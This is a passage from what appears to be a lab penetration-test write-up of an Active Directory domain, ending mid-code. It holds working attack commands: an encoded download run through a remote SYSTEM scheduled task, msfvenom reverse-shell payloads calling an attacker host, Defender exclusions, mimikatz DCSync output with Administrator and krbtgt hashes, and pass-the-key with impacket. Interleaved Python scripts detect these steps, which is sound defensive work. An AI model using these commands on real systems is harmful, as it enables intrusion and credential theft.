Name                          : {eb3987c9-20e7-4396-983e-2ae245234571}
DisplayName                   : Open Port 3389
Description                   :
DisplayGroup                  :
Group                         :
Enabled                       : True
Profile                       : Any
Platform                      : {}
Direction                     : Inbound
Action                        : Allow
EdgeTraversalPolicy           : Block
LooseSourceMapping            : False
LocalOnlyMapping              : False
Owner                         :
PrimaryStatus                 : OK
Status                        : The rule was parsed successfully from the store. (65536)
EnforcementStatus             : NotApplicable
PolicyStoreSource             : PersistentStore
PolicyStoreSourceType         : Local
RemoteDynamicKeywordAddresses : {}
PolicyAppId                   :
PackageFamilyName             :

6. Listed active network connections filtered by port 3389 (RDP Service).

PS C:\WINDOWS\system32> netstat -ano | findstr 3389
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       8500
  TCP    [::]:3389              [::]:0                 LISTENING       8500
  UDP    0.0.0.0:3389           *:*                                    8500
  UDP    [::]:3389              *:*                                    8500
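Steps 3 to 6 here, and the identical sequence on ADMIN03 earlier, enable RDP on a host that had it disabled: a registry write sets fDenyTSConnections to 0 and a firewall rule opens TCP 3389 inbound, all within seconds of each other. That pairing is the detection opportunity. The following is an added example, not code from the original writeup; it correlates the two events per host in Python over constructed telemetry (Sysmon Event ID 13, registry value set, and Windows Firewall Event ID 2004, rule added), flattened to JSON lines whose field names are assumptions made for this example rather than the native event schema.

```python
import json
from datetime import datetime, timedelta

# Constructed sample telemetry for this example: Sysmon EventID 13 (registry value set)
# and Windows Firewall EventID 2004 (rule added), flattened to JSON lines.
SAMPLE_EVENTS = r"""
{"ts":"2025-02-08T19:20:01","host":"ADMIN03","event_id":13,"image":"C:\\Windows\\System32\\reg.exe","target":"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections","details":"DWORD (0x00000000)"}
{"ts":"2025-02-08T19:20:09","host":"ADMIN03","event_id":2004,"rule_name":"Open Port 3389","direction":"Inbound","protocol":"TCP","local_ports":"3389","action":"Allow"}
{"ts":"2025-02-08T09:00:00","host":"WS07","event_id":13,"image":"C:\\Windows\\System32\\svchost.exe","target":"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections","details":"DWORD (0x00000001)"}
{"ts":"2025-02-08T11:30:00","host":"WS07","event_id":2004,"rule_name":"Open Port 3389","direction":"Inbound","protocol":"TCP","local_ports":"3389","action":"Allow"}
{"ts":"2025-02-08T08:00:00","host":"WS08","event_id":13,"image":"C:\\Windows\\System32\\msiexec.exe","target":"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections","details":"DWORD (0x00000000)"}
{"ts":"2025-02-08T10:00:00","host":"WS08","event_id":2004,"rule_name":"Helpdesk RDP","direction":"Inbound","protocol":"TCP","local_ports":"3389","action":"Allow"}
"""

# Registry value that disables Remote Desktop when 1 and enables it when 0.
TS_VALUE_SUFFIX = "\\terminal server\\fdenytsconnections"
# Enable + firewall rule closer together than this is treated as one operator action.
WINDOW = timedelta(minutes=30)


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def rdp_enabled(ev: dict) -> bool:
    """Sysmon 13 setting fDenyTSConnections to 0."""
    return (ev["event_id"] == 13
            and ev["target"].lower().endswith(TS_VALUE_SUFFIX)
            and "0x00000000" in ev["details"])


def rdp_rule_opened(ev: dict) -> bool:
    """Firewall 2004: inbound TCP 3389 allowed."""
    return (ev["event_id"] == 2004
            and ev["direction"] == "Inbound"
            and ev["action"] == "Allow"
            and ev["protocol"].upper() == "TCP"
            and "3389" in [p.strip() for p in ev["local_ports"].split(",")])


def detect_rdp_enablement(events: list) -> list:
    """One alert per (enable write, rule add) pair on the same host inside WINDOW."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)
    alerts = []
    for host, evs in by_host.items():
        enables = [e for e in evs if rdp_enabled(e)]
        rules = [e for e in evs if rdp_rule_opened(e)]
        for en in enables:
            t0 = datetime.fromisoformat(en["ts"])
            for ru in rules:
                delta = datetime.fromisoformat(ru["ts"]) - t0
                if timedelta(0) <= delta <= WINDOW:
                    alerts.append({"host": host, "enabled_at": en["ts"],
                                   "rule_at": ru["ts"], "process": en["image"],
                                   "rule_name": ru["rule_name"]})
    return alerts


if __name__ == "__main__":
    for a in detect_rdp_enablement(parse_events(SAMPLE_EVENTS)):
        print(a)
```

WS07 only ever sets the value to 1 (RDP stays off) and WS08's two events are two hours apart, so only ADMIN03 produces an alert. The `netsh advfirewall ... set rule group="remote desktop"` step in the writeup modifies existing rules rather than adding one, which surfaces as Event ID 2005 (rule modified); extending `rdp_rule_opened` to accept 2005 with the same fields catches that variant too.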

7. Initiated an RDP session to ADMIN03 using Helen's Credentials

┌──(kali㉿kali)-[~]
└─$ xfreerdp3 /cert:ignore /compression /auto-reconnect /u:helen /p:'chase#1' /v:10.10.14.160
[20:35:17:349] [114225:114226] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[20:35:17:349] [114225:114226] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[20:35:17:386] [114225:114226] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[20:35:17:386] [114225:114226] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[20:35:18:865] [114225:114226] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_BUMP_OPTIONS]

8. Created a Base64 Payload to Download a Reverse Shell Executable to ADMIN01

PS C:\Users\helen> $command = "curl http://10.10.14.10:8000/payload4451.exe -o C:\Users\Helen\payload4451.exe"
PS C:\Users\helen> $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
PS C:\Users\helen> $encodedCommand = [Convert]::ToBase64String($bytes)
PS C:\Users\helen> $encodedCommand
YwB1AHIAbAAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAwADoAOAAwADAAMAAvAHAAYQB5AGwAbwBhAGQANAA0ADUAMQAuAGUAeABlACAALQBvACAAQwA6AFwAVQBzAGUAcgBzAFwASABlAGwAZQBuAFwAcABhAHkAbABvAGEAZAA0ADQANQAxAC4AZQB4AGUA

9. Created a scheduled task on ADMIN01 to run the encoded PowerShell command as SYSTEM at the specified time.

PS C:\Users\helen> schtasks /create /S ADMIN01 /sc once /tn "download_payload" /st 23:59 /sd 01/19/2030 /ru SYSTEM /tr "powershell.exe -ep Bypass -EncodedCommand YwB1AHIAbAAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAwADoAOAAwADAAMAAvAHAAYQB5AGwAbwBhAGQANAA0ADUAMQAuAGUAeABlACAALQBvACAAQwA6AFwAVQBzAGUAcgBzAFwASABlAGwAZQBuAFwAcABhAHkAbABvAGEAZAA0ADQANQAxAC4AZQB4AGUA" /f
SUCCESS: The scheduled task "download_payload" has successfully been created.

10. Created a reverse shell binary

┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4451 -f exe -o payload4451.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: /home/kali/payload4451.exe

11. Confirmed the Python3 HTTP Server is Still Running

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

12. Triggered the execution of the scheduled task, downloading payload4451.exe on ADMIN01.

PS C:\Users\helen> schtasks /run /S ADMIN01 /TN "download_payload"
SUCCESS: Attempted to run the scheduled task "download_payload".

13. Created a new service named “MaliciousService” on ADMIN01 that will execute the downloaded payload on demand.

PS C:\Users\helen> sc.exe \\ADMIN01 create MaliciousService binPath= "C:\Users\Helen\payload4451.exe" type= own start= demand
[SC] CreateService SUCCESS

14. Started “MaliciousService” service on ADMIN01 to trigger the reverse shell connection.

PS C:\Users\helen> sc.exe \\ADMIN01 start MaliciousService
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

ADMIN01 Attacks

1. Spawned a Reverse Shell on ADMIN01 as SYSTEM

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4451
listening on [any] 4451 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.180] 49816
Microsoft Windows [Version 10.0.26100.2894]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32> hostname
hostname
ADMIN01

C:\Windows\System32> whoami
whoami
nt authority\system

2. Displayed the content of “service.log”, which indicates that “NewService.dll” is missing.

C:\Windows\System32> type C:\NewService\service.log
NewService.dll is missing.

3. Added a Windows Defender Exclusion for C:\NewService

C:\Windows\System32> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\System32> Add-MpPreference -ExclusionPath "C:\NewService"
Add-MpPreference -ExclusionPath "C:\NewService"

4. Created a reverse shell DLL

┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4452 -f dll > payload4452.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: /home/kali/payload4452.dll

5. Confirmed the Python3 HTTP Server is still Running

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

6. Downloaded "payload4452.dll" from Kali and saved it as "NewService.dll" in "C:\NewService".

C:\Windows\System32> curl http://10.10.14.10:8000/payload4452.dll -o C:\NewService\NewService.dll
curl http://10.10.14.10:8000/payload4452.dll -o C:\NewService\NewService.dll
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  9216  100  9216    0     0  2133k      0 --:--:-- --:--:-- --:--:-- 3000k

7. Started “NewService” service on ADMIN01 to trigger the reverse shell.

C:\Windows\System32> sc.exe \\ADMIN01 start NewService
sc.exe \\ADMIN01 start NewService
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

8. Spawned Reverse Shell as Jamie

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4452
listening on [any] 4452 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.180] 49806
Microsoft Windows [Version 10.0.26100.3194]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32>whoami
ad\jamie

C:\Windows\System32> hostname
hostname
ADMIN01

9. Confirmed Jamie is a Domain Admin.

C:\Windows\System32> whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                          Attributes
========================================== ================ ============================================ ===============================================================
Everyone                                   Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544                                 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                      Mandatory group, Enabled by default, Enabled group
AD\Domain Admins                           Group            S-1-5-21-3014030118-327537043-3250143841-512 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                     Mandatory group, Enabled by default, Enabled group
AD\Denied RODC Password Replication Group  Alias            S-1-5-21-3014030118-327537043-3250143841-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

10. Added a Windows Defender Exclusion for the current directory.

C:\Windows\System32> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\System32> Add-MpPreference -ExclusionPath "C:\Windows\System32"
Add-MpPreference -ExclusionPath "C:\Windows\System32"
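Several of the steps so far leave the same kind of footprint in the Windows event logs: the WMI-driven process creation in ADMIN03 steps 22 to 29 (Security 4688 with WmiPrvSE.exe as the parent of powershell.exe on the target), the remote scheduled task and service in ADMIN02 steps 9 to 14 (Security 4698 with an encoded command, System 7045 with a service binary under a user profile), and the Defender exclusions in steps 3 and 10 of this section (Microsoft-Windows-Windows Defender/Operational 5007). The following is an added example, not code from the original writeup; it runs a small rule set over constructed JSON-line records of those four event types in Python (field names and sample values are assumptions made for this example, not the native event schema).

```python
import json
import re

# Constructed sample telemetry for this example, flattened to JSON lines.
SAMPLE_EVENTS = r"""
{"ts":"2025-02-08T20:10:05","host":"ADMIN02","event_id":4688,"parent_image":"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe","new_process":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell -nop -w hidden -e SQBFAFgAIAAkAGQA"}
{"ts":"2025-02-08T20:40:11","host":"ADMIN01","event_id":4698,"subject":"AD\\helen","task_name":"\\download_payload","run_as":"SYSTEM","command":"powershell.exe -ep Bypass -EncodedCommand YwB1AHIAbAA="}
{"ts":"2025-02-08T20:41:30","host":"ADMIN01","event_id":7045,"service_name":"MaliciousService","image_path":"C:\\Users\\Helen\\payload4451.exe","start_type":"demand start","account":"LocalSystem"}
{"ts":"2025-02-08T20:45:02","host":"ADMIN01","event_id":5007,"old_value":"","new_value":"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Windows\\System32 = 0x0"}
{"ts":"2025-02-08T08:00:00","host":"WS07","event_id":7045,"service_name":"GoogleUpdater","image_path":"C:\\Program Files (x86)\\Google\\GoogleUpdater\\updater.exe --system","start_type":"auto start","account":"LocalSystem"}
{"ts":"2025-02-08T08:05:00","host":"WS07","event_id":4698,"subject":"WS07$","task_name":"\\Backup\\Nightly","run_as":"SYSTEM","command":"C:\\Program Files\\Backup\\backup.exe /quiet"}
"""

# -e / -ec / -enc / -EncodedCommand followed by an argument.
ENCODED_FLAG = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s")
# Locations a non-admin user can normally write to; a service binary there is suspect.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "\\temp\\")
# Defender 5007 records the changed registry value; pull the excluded path out of it.
EXCLUSION_PATH = re.compile(r"Exclusions\\Paths\\(.+?) = ")


def parse_events(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def check(ev: dict):
    """Return (rule, detail) when an event matches a rule, else None."""
    eid = ev["event_id"]
    if eid == 4688:
        parent = ev.get("parent_image", "").lower()
        if parent.endswith("\\wmiprvse.exe") and "powershell" in ev.get("new_process", "").lower():
            return ("powershell_spawned_by_wmi", ev.get("command_line", ""))
    elif eid == 4698:
        if ENCODED_FLAG.search(ev.get("command", "")):
            return ("encoded_scheduled_task", f'{ev["task_name"]} as {ev["run_as"]}')
    elif eid == 7045:
        path = ev.get("image_path", "").lower()
        if any(marker in path for marker in USER_WRITABLE):
            return ("service_binary_in_user_writable_path", ev["image_path"])
    elif eid == 5007:
        m = EXCLUSION_PATH.search(ev.get("new_value", ""))
        if m:
            return ("defender_path_exclusion_added", m.group(1))
    return None


def scan(events: list) -> list:
    """Apply check() to every event, preserving input order."""
    findings = []
    for ev in events:
        hit = check(ev)
        if hit:
            findings.append({"host": ev["host"], "ts": ev["ts"], "rule": hit[0], "detail": hit[1]})
    return findings


def by_host(findings: list) -> dict:
    """Count findings per host; several distinct rules on one host in a short span is the real signal."""
    counts = {}
    for f in findings:
        counts[f["host"]] = counts.get(f["host"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(parse_events(SAMPLE_EVENTS))
    for f in found:
        print(f)
    print(by_host(found))
```

A remotely created task or service records the requesting account in the event (the `subject` field here), so the ADMIN01 findings can be tied back to the helen session on ADMIN02; the WS07 records show an ordinary updater service and backup task passing through untouched.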

11. Prepared mimikatz.exe for download

┌──(kali㉿kali)-[~]
└─$ find / -name mimikatz.exe -type f 2>/dev/null
/usr/share/windows-resources/mimikatz/x64/mimikatz.exe
/usr/share/windows-resources/mimikatz/Win32/mimikatz.exe

┌──(kali㉿kali)-[~]
└─$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .

12. Downloaded mimikatz.exe

PS C:\Windows\System32> wget http://10.10.14.10:8000/mimikatz.exe -O mimikatz.exe

13. Launched Mimikatz and enabled the debug privilege (privilege::debug).

PS C:\Windows\System32> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

14. Performed a DC Sync Attack Against the Domain “Administrator” Account

mimikatz # lsadump::dcsync /user:Administrator
   
[DC] 'AD.LAB' will be the domain
[DC] 'DC01.AD.LAB' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 1/24/2025 1:48:42 PM
Object Security ID   : S-1-5-21-3014030118-327537043-3250143841-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 8842797845cabde1d8f43062d448ef49

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 4bcf99c0d5c2e92a7696c9807d6c3cf3

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos-Newer-Keys *
    Default Salt : WIN-H251RJ5K3LCAdministrator
    Default Iterations : 4096
    Credentials
      des_cbc_md5_nt    (4096) : b475f37e339ab5ec04f1b0c2d491fd8d1b92e0871e7bceedd230b5fd871f7aee
      unknow            (4096) : 5b9c1bd7ddd120f56b2600b72c4e117a
      aes256_hmac       (4096) : 0caf9f9cb9b2050ff19b05d666d2740f265fcddb3a48e2776884b4774c95e505
      aes128_hmac       (4096) : dad66760c5d23adc4ac24a210eeb038e
      rc4_hmac_nt       (4096) : 8842797845cabde1d8f43062d448ef49
    ServiceCredentials
      des_cbc_md5_nt    (4096) : b475f37e339ab5ec04f1b0c2d491fd8d1b92e0871e7bceedd230b5fd871f7aee
      unknow            (4096) : 5b9c1bd7ddd120f56b2600b72c4e117a
      aes256_hmac       (4096) : 0caf9f9cb9b2050ff19b05d666d2740f265fcddb3a48e2776884b4774c95e505
      aes128_hmac       (4096) : dad66760c5d23adc4ac24a210eeb038e

15. Performed a DC Sync Attack Against the Domain’s Kerberos Ticket Granting Ticket (TGT) Account

mimikatz # lsadump::dcsync /user:krbtgt
[DC] 'AD.LAB' will be the domain
[DC] 'DC01.AD.LAB' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 1/24/2025 4:32:04 PM
Object Security ID   : S-1-5-21-3014030118-327537043-3250143841-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 8ede040cc3cbd7649a7ab4e697d06af1
    ntlm- 0: 8ede040cc3cbd7649a7ab4e697d06af1
    lm  - 0: 5c794f5fabe33b29bd7f5357b5fcd22b

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 12fcc2dd860252616a608023ed83a2f4

* Primary:Kerberos-Newer-Keys *
    Default Salt : AD.LABkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : c87ee26d98cd7e5619ee2f4f112825d2f2eaf820f6f7207ccb7580f26f525bf3
      aes128_hmac       (4096) : 82059b064cf9e37442dd551a0a63478e
      rc4_hmac_nt       (4096) : 8ede040cc3cbd7649a7ab4e697d06af1
    ServiceCredentials
      aes256_hmac       (4096) : c87ee26d98cd7e5619ee2f4f112825d2f2eaf820f6f7207ccb7580f26f525bf3
      aes128_hmac       (4096) : 82059b064cf9e37442dd551a0a63478e

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  87cac500530835ff5072e5c2f3406578
    02  733ebafc9d4c215b3c345c73e3ad6c59
    03  270c47a3092a428602bbce8fcf1de09b
    04  87cac500530835ff5072e5c2f3406578
    05  733ebafc9d4c215b3c345c73e3ad6c59
    06  4ba17dd1d43fed0a98252ef4a5f91350
    07  87cac500530835ff5072e5c2f3406578
    08  173ce291e04e5ea682bcaa932da84c91
    09  599e30f14c68418ff425f3468d0be1d7
    10  0acb693f56033050549c3cd8874c7ad7
    11  173ce291e04e5ea682bcaa932da84c91
    12  599e30f14c68418ff425f3468d0be1d7
    13  cf11a723677dfaa69687227f2d84fc08
    14  173ce291e04e5ea682bcaa932da84c91
    15  c1f1fa0aaca8630124909784bb45c88f
    16  05a95f5c31e436bc03edc1d0ac95ad28
    17  bdb51e14cd66dc7074d80b6fb069aab9
    18  9f964c8788760262665ddf17a3c67ef0
    19  362415ec7d0a79ebeb8e01494077a204
    20  550d12e039a30907e5b7328514df5600
    21  8c7ee19d5565fb65c7b4ecb357535ca8
    22  8c7ee19d5565fb65c7b4ecb357535ca8
    23  77c1d633cc8dac2970ef3145fb8060b5
    24  ece6246c819d3465a2ef0244ae8d77fd
    25  b57822e9da5bfa37e1ca58555e30237b
    26  be8a4f29399954b631dcc98d7bd9732d
    27  ac0cc2b556264053a0939a1868b1462c
    28  ace73220c3d371e1fd77b51857e0f430
    29  ea27e480a0bda6cb1f44309107004e19
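
The two lsadump::dcsync runs in steps 14 and 15 look, from the domain controller's side, like a replication request from a principal that is not a domain controller. The detection below is an added example, not part of this write-up: it assumes "Audit Directory Service Access" is enabled so that event 4662 is written for the domain naming context, that the records reach you as flattened dicts (as a SIEM would deliver them), and that the only DC computer account in the lab is DC01$. The sample records are constructed, not real logs; the three replication GUIDs are the fixed AD schema values.

```python
import re

# Well-known Active Directory control access right GUIDs (lower-case) that
# replication requires. These are fixed values in the AD schema.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts expected to replicate: domain controller computer accounts.
# Constructed for this lab (DC01 is the only DC); a real allowlist is built
# from the members of the Domain Controllers OU.
KNOWN_DC_ACCOUNTS = {"DC01$"}

GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def parse_event(record):
    """Pull the fields the rule needs out of a flattened 4662 record.

    Records are dicts as a SIEM hands them over; "Properties" carries the
    access list (mask plus GUIDs in braces) that 4662 writes in its body.
    """
    guids = {g.lower() for g in GUID_RE.findall(record.get("Properties", ""))}
    return {
        "event_id": record["EventID"],
        "subject": record["SubjectUserName"],
        "domain": record["SubjectDomainName"],
        "object": record.get("ObjectName", ""),
        "rights": {REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS},
    }


def detect_dcsync(records, known_dc_accounts=KNOWN_DC_ACCOUNTS):
    """Return one alert per 4662 event in which a non-DC account used a replication right.

    A domain controller's computer account exercising these rights is normal
    replication; any other principal doing so is what lsadump::dcsync looks
    like from the DC's side.
    """
    alerts = []
    for rec in records:
        ev = parse_event(rec)
        if ev["event_id"] != 4662 or not ev["rights"]:
            continue
        if ev["subject"] in known_dc_accounts:
            continue
        alerts.append({
            "subject": f"{ev['domain']}\\{ev['subject']}",
            "object": ev["object"],
            "rights": sorted(ev["rights"]),
        })
    return alerts


# Constructed sample records (not real logs). The first mimics DC01 replicating
# normally, the second mimics the domain-admin session in the write-up pulling
# secrets for the naming context, the third is an ordinary directory read.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": "AD",
     "ObjectName": "DC=ad,DC=lab",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "Administrator", "SubjectDomainName": "AD",
     "ObjectName": "DC=ad,DC=lab",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "Administrator", "SubjectDomainName": "AD",
     "ObjectName": "CN=Jamie,CN=Users,DC=ad,DC=lab",
     # placeholder GUID for a non-replication property right (constructed)
     "Properties": "Read Property {00000000-0000-0000-0000-00000000abcd}"},
]

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(f"[!] possible DCSync: {a['subject']} used {', '.join(a['rights'])} on {a['object']}")
```

The rule keys on the Get-Changes-All right rather than on the account's group membership: a Domain Admin replicating secrets is exactly the case worth an alert, and a DC computer account is the only principal with a business reason to hold that right.
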

DC01 Attacks

1. Copied getTGT.py to the current working directory

┌──(kali㉿kali)-[~]
└─$ sudo updatedb

┌──(kali㉿kali)-[~]
└─$ locate getTGT.py
/usr/lib/python3/dist-packages/minikerberos/examples/getTGT.py
/usr/share/doc/python3-impacket/examples/getTGT.py

┌──(kali㉿kali)-[~]
└─$ cp /usr/share/doc/python3-impacket/examples/getTGT.py .

2. Used the Domain “Administrator” account’s AES256 Key to request a Kerberos TGT for the administrator account:

┌──(kali㉿kali)-[~]
└─$ python3 getTGT.py -aesKey 0caf9f9cb9b2050ff19b05d666d2740f265fcddb3a48e2776884b4774c95e505 ad.lab/administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in administrator.ccache

3. Set the Kerberos Cache Environmental Variable.

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=administrator.ccache

4. Verified the Kerberos Ticket Cache

┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:administrator.ccache
Default principal: administrator@AD.LAB

Valid starting       Expires              Service principal
02/08/2025 23:28:37  02/09/2025 09:28:37  krbtgt/AD.LAB@AD.LAB
        renew until 02/09/2025 23:28:39

5. Launched a semi-interactive remote WMI command shell as Administrator on the domain controller:

┌──(kali㉿kali)-[~]
└─$ impacket-wmiexec -k -no-pass -dc-ip 10.10.14.1 -target-ip 10.10.14.1 dc01.ad.lab
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

6. Modified the registry to enable Remote Desktop by setting the fDenyTSConnections value to 0.

C:\> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.

7. Created a new firewall rule to allow inbound TCP traffic on port 3389, which is used by RDP.

C:\> netsh advfirewall firewall add rule name="Allow RDP Inbound" dir=in action=allow protocol=TCP localport=3389
Ok.

8. Listed active network connections and listeners filtered by port 3389 to verify that the RDP service is listening.

C:\> netstat -ano | findstr 3389
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       2892
  TCP    [::]:3389              [::]:0                 LISTENING       2892
  UDP    0.0.0.0:3389           *:*                                    2892
  UDP    [::]:3389              *:*                                    2892
  UDP    [::]:53389             *:*                                    3180

9. Reset Jamie's Password

C:\> net user Jamie NewPassword123
The command completed successfully.
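
Steps 6 to 9 each leave a distinct Security-log event on DC01, and together they read as one session: the registry change that turns RDP on, the firewall rule that opens 3389, and a password reset that gives the operator a credential to log in with. The correlation below is an added example, not part of this write-up. It assumes event 4657 is generated (the "Audit Registry" subcategory must be on and the Terminal Server key must carry a SACL), that 4946 and 4724 are collected, and that records arrive as dicts with a parsed TimeCreated. 4946 carries no Subject fields, so it is attached on timing alone. All records are constructed.

```python
from datetime import datetime, timedelta

# How close together the changes must be to be treated as one hands-on session.
WINDOW = timedelta(minutes=15)

# Registry path as 4657 reports it (kernel object name, not the HKLM\ form).
TS_KEY = r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"


def classify(e):
    """Map one Security event to an action label, or None if it is not of interest."""
    eid = e["EventID"]
    if (eid == 4657 and e.get("ObjectName", "").lower() == TS_KEY.lower()
            and e.get("ObjectValueName", "").lower() == "fdenytsconnections"
            and e.get("NewValue") == "0"):
        return "rdp-enabled-in-registry"
    if eid == 4946:
        return f"firewall-rule-added:{e.get('RuleName', '?')}"
    if eid == 4724:
        return f"password-reset:{e.get('TargetUserName', '?')}"
    return None


def correlate_rdp_enablement(records, window=WINDOW):
    """Anchor on each fDenyTSConnections=0 change and attach related changes.

    The registry change is the trigger; a firewall rule added in the same
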